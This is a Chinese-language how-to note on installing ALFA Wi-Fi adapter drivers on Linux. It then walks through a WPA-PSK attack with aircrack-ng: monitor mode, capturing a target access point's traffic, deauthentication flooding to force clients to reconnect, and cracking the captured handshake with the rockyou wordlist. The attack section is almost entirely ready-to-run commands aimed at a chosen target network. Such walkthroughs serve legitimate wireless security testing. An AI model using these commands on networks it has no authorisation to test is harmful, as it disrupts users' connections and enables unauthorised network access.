ALFA AWUS1900 驅動安裝

  1. 查看是否有找到該網卡,沒有的話注意VM的USB裝置是否啟用
lsusb
  1. 更新與安裝相關套件
sudo apt-get update && apt-get upgrade
sudo reboot
sudo apt install -y linux-headers-$(uname -r) build-essential dkms git libelf-dev
cd ~/src
git clone https://github.com/morrownr/8814au.git
cd ~/src/8814au
sudo apt-get install bc
sudo ./install-driver.sh
sudo reboot
  1. 查看是否有出現wlan0或其他名稱之無線網卡
ip a
iwconfig

網路文章說要v1才可以,實測新版v3也可以 安裝過程

sudo apt update
sudo apt upgrade
reboot
sudo apt install bc
sudo apt-get install build-essential
sudo apt-get install libelf-dev
sudo apt install dkms
sudo rmmod r8188eu.ko
git clone https://github.com/drygdryg/rtl8188eus 
cd rtl8188eus
sudo -i
echo 'blacklist r8188eu'|sudo tee -a '/etc/modprobe.d/realtek.conf'
exit
reboot
sudo apt update
cd rtl8188eus
sudo make && make install
sudo apt-get install linux-headers-$(uname -r) // 這行失敗沒關係
sudo modprobe 8188eu
reboot

WiFi錄包

  1. 啟用網卡監聽模式
sudo airmon-ng start wlan0
  1. Kill部分會影響監聽網卡介面的Process
sudo airmon-ng check kill
  1. 掃描附近的AP
sudo airodump-ng wlan0
  1. 監聽此AP,記錄這個WiFi的封包並儲存成檔案
sudo airodump-ng -c [channel] --bssid [bssid] wlan0 -w Desktop/aircrackTest/[Testfilename]

WiFi Deauth & WiFi Brute-Force

  1. 解壓縮內建字典檔或下載其他字典檔
gunzip /usr/share/wordlists/rockyou.txt.gz
  1. 啟用網卡監聽模式
sudo airmon-ng start wlan0
  1. Kill部分會影響監聽網卡介面的Process
sudo airmon-ng check kill
  1. 掃描附近的AP
sudo airodump-ng wlan0

  1. 找到要測試/攻擊的目標,複製其BSSID與Channel

  2. 監聽此AP,記錄這個WiFi的封包並儲存成檔案 (儲存路徑的資料夾需先創建否則會失敗,檔名會依照給的文字+數字自動增加)

sudo airodump-ng -c <channel> --bssid <your bssid>  wlan0 -w /路徑/<紀錄所有封包的檔名>

注意若該AP有開啟自動調整頻道,-c需與該頻道相同,若僅為了測試可將AP設定為固定頻道,並指定網卡監聽頻道為特定頻道,否則監聽不到

sudo airmon-ng start wlan0 11
  1. 再開啟一個終端機(將手機連線那台AP的WiFi並開啟自動連接) 使用以下指令,不斷的斷開所有連接那台AP的WiFi連線
sudo aireplay-ng --deauth <斷開次數> -a <your bssid> wlan0

  1. 如果使用者有打開自動連線的話,斷線後就會嘗試再連線,這樣就能抓取WPA handshake的封包。執行完成並且另一個airodump視窗有顯示 WPA handshake: <your bbsid> 字樣,就可以關閉aireplay視窗

  2. 將剛剛抓取到的封包的紀錄檔(.cap),使用字典檔暴力破解。

sudo aircrack-ng <封包檔名>.cap -w /usr/share/wordlists/rockyou.txt
  1. 結束網卡監聽模式,重啟網路介面服務
sudo airmon-ng stop wlan0 
systemctl restart NetworkManager

Ref.

  1. https://hackmd.io/@10sun/aircrack-ng_WPA-PSK
  2. https://www.youtube.com/watch?v=K9mceYeWf8M
  3. https://ithelp.ithome.com.tw/articles/10189183
  4. https://ithelp.ithome.com.tw/articles/10280033